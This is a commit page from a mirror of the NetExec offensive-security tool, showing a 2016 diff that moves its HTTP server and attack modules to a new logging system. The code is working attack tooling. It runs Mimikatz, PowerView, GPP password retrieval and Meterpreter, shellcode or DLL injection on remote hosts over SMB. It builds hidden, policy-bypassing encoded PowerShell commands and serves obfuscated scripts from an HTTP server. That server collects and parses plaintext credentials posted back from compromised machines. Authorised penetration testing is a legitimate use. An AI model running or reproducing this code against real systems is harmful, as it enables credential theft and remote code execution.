swisskyrepo
/
NetExec
mirror of https://github.com/swisskyrepo/NetExec.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

- HTTP/S server now uses the new logging system

main
byt3bl33d3r 2016-01-17 00:09:45 -07:00
parent 256f2cd12d
commit 3aaa378a23
3 changed files with 86 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

72
core/greenlets.py
View File

@ -231,39 +231,93 @@ def main_greenlet(host):
service_control.run(host)
if settings.args.command:
EXECUTOR(cme_logger, settings.args.command, host, domain, settings.args.no_output, smb, settings.args.execm)
EXECUTOR(cme_logger,
settings.args.command,
host,
domain,
settings.args.no_output,
smb,
settings.args.execm)
if settings.args.pscommand:
EXECUTOR(cme_logger, ps_command(settings.args.pscommand), host, domain, settings.args.no_output, smb, settings.args.execm)
EXECUTOR(cme_logger,
ps_command(settings.args.pscommand, settings.args.ps_arch),
host,
domain,
settings.args.no_output,
smb,
settings.args.execm)
if settings.args.mimikatz:
powah_command = PowerShell(settings.args.server, local_ip)
EXECUTOR(cme_logger, powah_command.mimikatz(), host, domain, True, smb, settings.args.execm)
EXECUTOR(cme_logger,
powah_command.mimikatz(),
host,
domain,
True,
smb,
settings.args.execm)
if settings.args.gpp_passwords:
powah_command = PowerShell(settings.args.server, local_ip)
EXECUTOR(cme_logger, powah_command.gpp_passwords(), host, domain, True, smb, settings.args.execm)
EXECUTOR(cme_logger,
powah_command.gpp_passwords(),
host,
domain,
True,
smb,
settings.args.execm)
if settings.args.mimikatz_cmd:
powah_command = PowerShell(settings.args.server, local_ip)
EXECUTOR(cme_logger, powah_command.mimikatz(settings.args.mimikatz_cmd), host, domain, True, smb, settings.args.execm)
EXECUTOR(cme_logger,
powah_command.mimikatz(settings.args.mimikatz_cmd),
host,
domain,
True,
smb,
settings.args.execm)
if settings.args.powerview:
#For some reason powerview functions only seem to work when using smbexec...
#I think we might have a mistery on our hands boys and girls!
powah_command = PowerShell(settings.args.server, local_ip)
EXECUTOR(cme_logger, powah_command.powerview(settings.args.powerview), host, domain, True, smb, 'smbexec')
EXECUTOR(cme_logger,
powah_command.powerview(settings.args.powerview),
host,
domain,
True,
smb,
'smbexec')
if settings.args.inject:
powah_command = PowerShell(settings.args.server, local_ip)
if settings.args.inject.startswith('met_'):
EXECUTOR(cme_logger, powah_command.inject_meterpreter(), host, domain, True, smb, settings.args.execm)
EXECUTOR(cme_logger,
powah_command.inject_meterpreter(),
host,
domain,
True,
smb,
settings.args.execm)
if settings.args.inject == 'shellcode':
EXECUTOR(cme_logger, powah_command.inject_shellcode(), host, domain, True, smb, settings.args.execm)
EXECUTOR(cme_logger,
powah_command.inject_shellcode(),
host,
domain,
True,
smb,
settings.args.execm)
if settings.args.inject == 'dll' or settings.args.inject == 'exe':
EXECUTOR(cme_logger, powah_command.inject_exe_dll(), host, domain, True, smb, settings.args.execm)
EXECUTOR(cme_logger,
powah_command.inject_exe_dll(),
host,
domain,
True,
smb,
settings.args.execm)
try:
smb.logoff()
except:

2
core/powershell.py
View File

@ -13,7 +13,7 @@ def ps_command(command, arch):
logging.info('Forcing the following command to execute in a 32bit PS process: ' + command)
command = '%SystemRoot%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(command.encode('UTF-16LE')))
elif arch == 64:
elif arch == 64 or arch == 'auto':
command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(command.encode('UTF-16LE')))
logging.info('Full PS command: ' + command)

37
core/servers/mimikatz.py
View File

@ -1,8 +1,9 @@
from BaseHTTPServer import BaseHTTPRequestHandler
from threading import Thread
from core.logger import *
from datetime import datetime
from StringIO import StringIO
from core.logger import CMEAdapter
import logging
import core.settings as settings
import os
import re
@ -16,13 +17,14 @@ synopsis = re.compile('<#.+#>')
class MimikatzServer(BaseHTTPRequestHandler):
def log_message(self, format, *args):
print_message("%s - - %s" % (self.client_address[0], format%args))
cme_logger = logging.getLogger('CME')
cme_logger.info("%s - - %s" % (self.client_address[0], format%args))
def save_mimikatz_output(self, data):
def save_mimikatz_output(self, data, cme_logger):
log_name = 'Mimikatz-{}-{}.log'.format(self.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
with open('logs/' + log_name, 'w') as creds:
creds.write(data)
print_status("{} Saved POST data to {}".format(self.client_address[0], yellow(log_name)))
cme_logger.info("Saved Mimikatz's output to {}".format(log_name))
def do_GET(self):
if self.path[1:].endswith('.ps1') and self.path[1:] in os.listdir('hosted'):
@ -33,7 +35,7 @@ class MimikatzServer(BaseHTTPRequestHandler):
if self.path[1:] != 'powerview.ps1':
logging.info('Obfuscating Powershell script')
ps_script = eval(synopsis.sub('', repr(ps_script))) #Removes the synopsys
ps_script = func_name.sub(settings.args.obfs_func_name, ps_script) #Randomizes the function name
ps_script = func_name.sub(settings.obfs_func_name, ps_script) #Randomizes the function name
ps_script = comments.sub('', ps_script) #Removes the comments
#logging.info('Sending the following modified powershell script: {}'.format(ps_script))
self.wfile.write(ps_script)
@ -55,6 +57,11 @@ class MimikatzServer(BaseHTTPRequestHandler):
length = int(self.headers.getheader('content-length'))
data = self.rfile.read(length)
cme_logger = CMEAdapter(logging.getLogger('CME'), {'host': self.client_address[0],
'port': self.client_address[1],
'service': 'PARSER',
'hostname': ''})
if settings.args.mimikatz:
try:
buf = StringIO(data).readlines()
@ -70,30 +77,30 @@ class MimikatzServer(BaseHTTPRequestHandler):
i += 1
if plaintext_creds:
print_succ('{} Found plain text credentials (domain\\user:password):'.format(self.client_address[0]))
cme_logger.success('Found plain text credentials (domain\\user:password)')
for cred in plaintext_creds:
print_att(u'{}'.format(cred))
cme_logger.results(u'{}'.format(cred))
except Exception as e:
print_error("Error while parsing Mimikatz output: {}".format(e))
cme_logger.error("Error while parsing Mimikatz output: {}".format(e))
self.save_mimikatz_output(data)
self.save_mimikatz_output(data, cme_logger)
elif settings.args.mimikatz_cmd:
print_succ('{} Mimikatz command output:'.format(self.client_address[0]))
print_att(data)
cme_logger.success('Got Mimikatz command output')
cme_logger.results(data)
self.save_mimikatz_output(data)
elif settings.args.powerview and data:
print_succ('{} PowerView command output:'.format(self.client_address[0]))
cme_logger.success('Got PowerView command output')
buf = StringIO(data.strip()).readlines()
for line in buf:
print_att(line.strip())
cme_logger.results(line.strip())
elif settings.args.gpp_passwords and data:
print_succ('{} Get-GPPPasswords output:'.format(self.client_address[0]))
cme_logger.success('Got Get-GPPPasswords output')
buf = StringIO(data.strip()).readlines()
for line in buf:
print_att(line.strip())
cme_logger.results(line.strip())
def http_server(port):
http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer)